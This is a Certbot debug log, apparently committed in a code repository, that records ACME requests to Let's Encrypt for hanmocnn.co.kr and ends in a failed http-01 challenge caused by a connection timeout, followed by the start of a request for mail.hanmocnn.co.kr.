"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QmpOTFB5Q29sZGJFbFY1N3ZsMUZOaGwzMG1OeDVvLVJ2WThSNlBKbzJSNjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
"signature": "qN8X02M3qa1Ed8e8wWUDDn79drKvTl5NtGAiGpEmIIFEeuPoAmrppUeoo6UVjHoV2eIiYbI4tUTNIVbFYjffOkp9JlG5od3hSIix65LeFHPl7-9hg19zKFJiQma53yVbub7OFGeFqFj-IrXb8-5eiEy2mgxZ0aMznirCicV_zp_bLsH36z-E_bU1fFaNMPMTEwjqC8pudu87REDCqyTYepiezGO4rgjDda4Ddcb2zF2WpmAEasSSUx1cTwgmzs4kTT6RZFedefRw730Ecri9vwGi7QuvHHvZ_HywdGejwcMQ8bRDxSBssJXJJOsw5AHfkktnbIR3UtZ-sbBOT9_A3g",
"payload": ""
}
2026-02-14 23:56:06,724:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777
2026-02-14 23:56:06,725:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:06 GMT
Content-Type: application/json
Content-Length: 777
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TG1OrA2e5G5sPzCyRvfzoUiUWFZAniIMDJOqe2pcuVeR0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "www.hanmocnn.co.kr"
},
"status": "valid",
"expires": "2026-03-16T22:37:07Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
"status": "valid",
"validated": "2026-02-14T22:37:00Z",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
"validationRecord": [
{
"url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
"hostname": "www.hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"222.117.41.51"
],
"addressUsed": "222.117.41.51"
}
]
}
]
}
2026-02-14 23:56:06,725:DEBUG:acme.client:Storing nonce: NeKnt8TG1OrA2e5G5sPzCyRvfzoUiUWFZAniIMDJOqe2pcuVeR0
2026-02-14 23:56:06,726:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:56:06,730:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhURzFPckEyZTVHNXNQekN5UnZmem9VaVVXRlpBbmlJTURKT3FlMnBjdVZlUjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
"signature": "qt11UnIYlgfU1E5jyT6qBNkGSoLXiZdyHKs3sQXhWI9yG363SPzQ78zH0oElA6LJgJgAS0mhkfZZtfU1lTzBrHZ_XLx5S0q-KQ-GZmcl-BOwB42l1jR13Bg6kJXowtDsqGZpZ0qoHG3rKqAUUchFQpX3NAPIqs15598OlpOBRG17MP8cF6HZJMWZsPIh4GGUDReGFRQdRjKhbr0ep3dnyWDIBdLD0LIrOUAMd5absl4Jn9Vd4nolz50iaFpZ88HxjOOx_OmeCOQ4v3ycagZ8dJLSSvT_PBMLlbH3_pyPVrBG5rafoph9pxQ5YM3oNWRVMXxmJqU_qKrr3k7LEjifAg",
"payload": ""
}
2026-02-14 23:56:06,894:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
2026-02-14 23:56:06,895:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:06 GMT
Content-Type: application/json
Content-Length: 822
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvBYLdUOTkkarVTTilYf8jHyGJhY1FlIsWUvBpM4NLDU2k
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:56:04Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
}
]
}
2026-02-14 23:56:06,895:DEBUG:acme.client:Storing nonce: 4AH-2vvBYLdUOTkkarVTTilYf8jHyGJhY1FlIsWUvBpM4NLDU2k
2026-02-14 23:56:06,896:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
2026-02-14 23:56:09,897:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:56:09,901:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QllMZFVPVGtrYXJWVFRpbFlmOGpIeUdKaFkxRmxJc1dVdkJwTTROTERVMmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
"signature": "pjocFNC1rCf2Jkfu67Zw3Smbc0HZTvM6bynfejd_aK7NWjRvp1EMvfO_q3cMjf0B_R1S25UEc3SdvQO25fQzspYAvn-7VY-CO29v_CVW1yoriJmh9qagA8_ooC_de9cJfhwNh2YPZwecMtGCUgB9hZjUqTE89bBjtCAFTgsdf-b37WV5DFET3KpTg29VAurpW2YmMth21ueSmxdiB-ZyxJC1j4kmVaefSilRoeUkqBeAzFX_XdPP9gvoSk5XbDL24jte1XCbgiEUloUot0qveRNkGEu_anFWbGNIKTPqUZeeb8hK-xlSmUAFP3l2_W1tFa32nLqJ0XOKKWm3Kh4EVw",
"payload": ""
}
2026-02-14 23:56:10,065:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
2026-02-14 23:56:10,066:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:09 GMT
Content-Type: application/json
Content-Length: 822
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TGCjx_fZhQ5WDhl6vE45VknmXThsT1pOTmkYxO0Y0ehxU
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:56:04Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
}
]
}
2026-02-14 23:56:10,066:DEBUG:acme.client:Storing nonce: NeKnt8TGCjx_fZhQ5WDhl6vE45VknmXThsT1pOTmkYxO0Y0ehxU
2026-02-14 23:56:10,066:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
2026-02-14 23:56:13,067:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:56:13,072:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0NqeF9mWmhRNVdEaGw2dkU0NVZrbm1YVGhzVDFwT1Rta1l4TzBZMGVoeFUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
"signature": "X4fvammVhgMxlJAAaYpyehvxOy40N9oRAHl5Ug7k032b59S1NIAjoffSB9EKi7xJ7B8SJCxU-oFwILoU1Ldm-vikMwRkEtTMIMGWMdmy3WNZD4R0nj5yodIgWh5x3W5Pxc77hcYK6tiNGAtA92Ui3kgRrkMmFlFrJN-qummEA77X2Yhmn56pcGoH5xSJooAG4WifWgRWVbYz1vsGRHDctVKaKMb5-99OBsw-QLVJ_mzMvzD73vNM7OsVNNM-tmhDq_pmyJ1a4aJQN5-7CLG9pfaaDVAxrZDHjeTsQD3MwoGQ7xY5U59h2o8rgIB8TYefEiUNBom8EMyayTYhGFGfOw",
"payload": ""
}
2026-02-14 23:56:13,236:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
2026-02-14 23:56:13,237:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:13 GMT
Content-Type: application/json
Content-Length: 822
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvBWmoNXqbP_G__zB5zN3RERigaNgY-khTArYZDgbv2X_k
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:56:04Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
}
]
}
2026-02-14 23:56:13,237:DEBUG:acme.client:Storing nonce: 4AH-2vvBWmoNXqbP_G__zB5zN3RERigaNgY-khTArYZDgbv2X_k
2026-02-14 23:56:13,238:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
2026-02-14 23:56:16,238:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:56:16,243:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qldtb05YcWJQX0dfX3pCNXpOM1JFUmlnYU5nWS1raFRBcllaRGdidjJYX2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
"signature": "VUS-lzk9Z3loxvUEDVuMC_FAo4nIIaN6ASpX2W6ee1LV95WxuuirwwVvgC5LNneJKctrI_sZWZHmsg_gdbPaF1TVPDHoNeYy-q4CahPRRibPnTeELJ1Pwb9QB6IU-H6cSswTZLKwwerZpTWE70RElAyE4SJVniuQ9R0ZyyXqOUoYGCQDrqLTgaRyjMVi3gPrmyXAOXQGo8wxe_ptEaxaDOkyhvCXuZ1fU6TIz1HMFnBy4zIzkEbFiZlqR1dPOwJe5YPRRGgaISJyWqb9f_ksyRJWNrTAVL0tUN2fKx8bzrRmSUOr3X_O68f53h_Dda1RZ3gxmIBcxjcoAZbTR2hRHw",
"payload": ""
}
2026-02-14 23:56:16,406:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
2026-02-14 23:56:16,407:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:16 GMT
Content-Type: application/json
Content-Length: 822
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvBMeztInZzGTaqtySBQba_zA2UlxHA7wD9hPW6YEGqHVc
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:56:04Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
}
]
}
2026-02-14 23:56:16,420:DEBUG:acme.client:Storing nonce: 4AH-2vvBMeztInZzGTaqtySBQba_zA2UlxHA7wD9hPW6YEGqHVc
2026-02-14 23:56:16,421:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
2026-02-14 23:56:19,422:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:56:19,426:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qk1lenRJblp6R1RhcXR5U0JRYmFfekEyVWx4SEE3d0Q5aFBXNllFR3FIVmMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
"signature": "NPoDinMY-lpRRfnPp-YkArm_aAxytG8RLCQM_eQfhXpDeelMX2mG-OwZceFZy9-wn6yWgqmKN-7RPZ3pWl_5xIAqqLIB6LAaE3nPiQkU5AfViP7KOE2WumQgLfPLtuqa73v9JD2tJpV7Lbxo-X_EidM6Rs6t9vdjTLmY7uYwFUvEb7SzpHISaehnrj8aA17I8qJgLBhGtyvHbzhnv7Nira9Lw2TWOlO1lIMgHtLMFvuyFnCzOkfEqvVTjzWN7RhKQ_WM7hj2A3XSw81N4iYhIs8E68Mg2Z8fHHu7VCrGjqgWBifEKCrOAjwieKsvb66nKsSsWSchbIo26PNfwhCXVg",
"payload": ""
}
2026-02-14 23:56:19,603:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 1065
2026-02-14 23:56:19,603:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:19 GMT
Content-Type: application/json
Content-Length: 1065
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TGK04pYxuaJhFJTtcVaz449MbsEz3fo4B6O33Ocq9f2Jk
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "hanmocnn.co.kr"
},
"status": "invalid",
"expires": "2026-02-21T23:56:04Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
"status": "invalid",
"validated": "2026-02-14T23:56:05Z",
"error": {
"type": "urn:ietf:params:acme:error:connection",
"detail": "221.150.111.87: Fetching http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0: Timeout during connect (likely firewall problem)",
"status": 400
},
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0",
"validationRecord": [
{
"url": "http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0",
"hostname": "hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"221.150.111.87"
],
"addressUsed": "221.150.111.87"
}
]
}
]
}
2026-02-14 23:56:19,604:DEBUG:acme.client:Storing nonce: NeKnt8TGK04pYxuaJhFJTtcVaz449MbsEz3fo4B6O33Ocq9f2Jk
2026-02-14 23:56:19,604:INFO:certbot._internal.auth_handler:Challenge failed for domain hanmocnn.co.kr
2026-02-14 23:56:19,604:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='hanmocnn.co.kr')
2026-02-14 23:56:19,604:DEBUG:certbot._internal.display.obj:Notifying user:
Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems:
Identifier: hanmocnn.co.kr
Type: connection
Detail: 221.150.111.87: Fetching http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0: Timeout during connect (likely firewall problem)
Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet.
2026-02-14 23:56:19,606:DEBUG:certbot._internal.error_handler:Encountered exception:
Traceback (most recent call last):
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations
self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort)
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations
raise errors.AuthorizationError('Some challenges have failed.')
certbot.errors.AuthorizationError: Some challenges have failed.
2026-02-14 23:56:19,606:DEBUG:certbot._internal.error_handler:Calling registered functions
2026-02-14 23:56:19,606:INFO:certbot._internal.auth_handler:Cleaning up challenges
2026-02-14 23:56:19,606:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0
2026-02-14 23:56:19,607:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
2026-02-14 23:56:19,607:DEBUG:certbot._internal.log:Exiting abnormally:
Traceback (most recent call last):
File "/opt/certbot/bin/certbot", line 6, in <module>
sys.exit(main())
^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main
return internal_main.main(cli_args)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1886, in main
return config.func(config, plugins)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1598, in certonly
lineage = _get_and_save_cert(le_client, config, sans, certname, lineage)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 143, in _get_and_save_cert
lineage = le_client.obtain_and_enroll_certificate(sans, certname)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 533, in obtain_and_enroll_certificate
cert, chain, key, _ = self.obtain_certificate(sans)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 434, in obtain_certificate
orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 512, in _get_order_and_authorizations
authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations
self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort)
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations
raise errors.AuthorizationError('Some challenges have failed.')
certbot.errors.AuthorizationError: Some challenges have failed.
2026-02-14 23:56:19,610:ERROR:certbot._internal.log:Some challenges have failed.

View File

@@ -1,820 +0,0 @@
2026-02-14 23:36:10,097:DEBUG:certbot._internal.main:certbot version: 5.3.0
2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-4', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'mail.hanmocnn.co.kr']
2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2026-02-14 23:36:10,111:DEBUG:certbot._internal.log:Root logging level set at 30
2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
Interfaces: Authenticator, Plugin
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffffb0250390>
Prep: True
2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffffb0250390> and installer None
2026-02-14 23:36:10,114:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
2026-02-14 23:36:10,346:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
2026-02-14 23:36:10,347:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
2026-02-14 23:36:10,350:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
2026-02-14 23:36:10,925:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
2026-02-14 23:36:10,926:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:10 GMT
Content-Type: application/json
Content-Length: 1033
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"gl0y9KAY6WE": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
"meta": {
"caaIdentities": [
"letsencrypt.org"
],
"profiles": {
"classic": "https://letsencrypt.org/docs/profiles#classic",
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
},
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
"website": "https://letsencrypt.org"
},
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
}
2026-02-14 23:36:10,927:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for mail.hanmocnn.co.kr
2026-02-14 23:36:10,931:DEBUG:acme.client:Requesting fresh nonce
2026-02-14 23:36:10,931:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
2026-02-14 23:36:11,106:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
2026-02-14 23:36:11,106:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:36:11 GMT
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: QkEzerAfyjd0yzrV6j-gWFKMfQxcQwKY8xlPoqJkffKPGd6xz5E
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
2026-02-14 23:36:11,107:DEBUG:acme.client:Storing nonce: QkEzerAfyjd0yzrV6j-gWFKMfQxcQwKY8xlPoqJkffKPGd6xz5E
2026-02-14 23:36:11,107:DEBUG:acme.client:JWS payload:
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "mail.hanmocnn.co.kr"\n }\n ]\n}'
2026-02-14 23:36:11,113:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
{
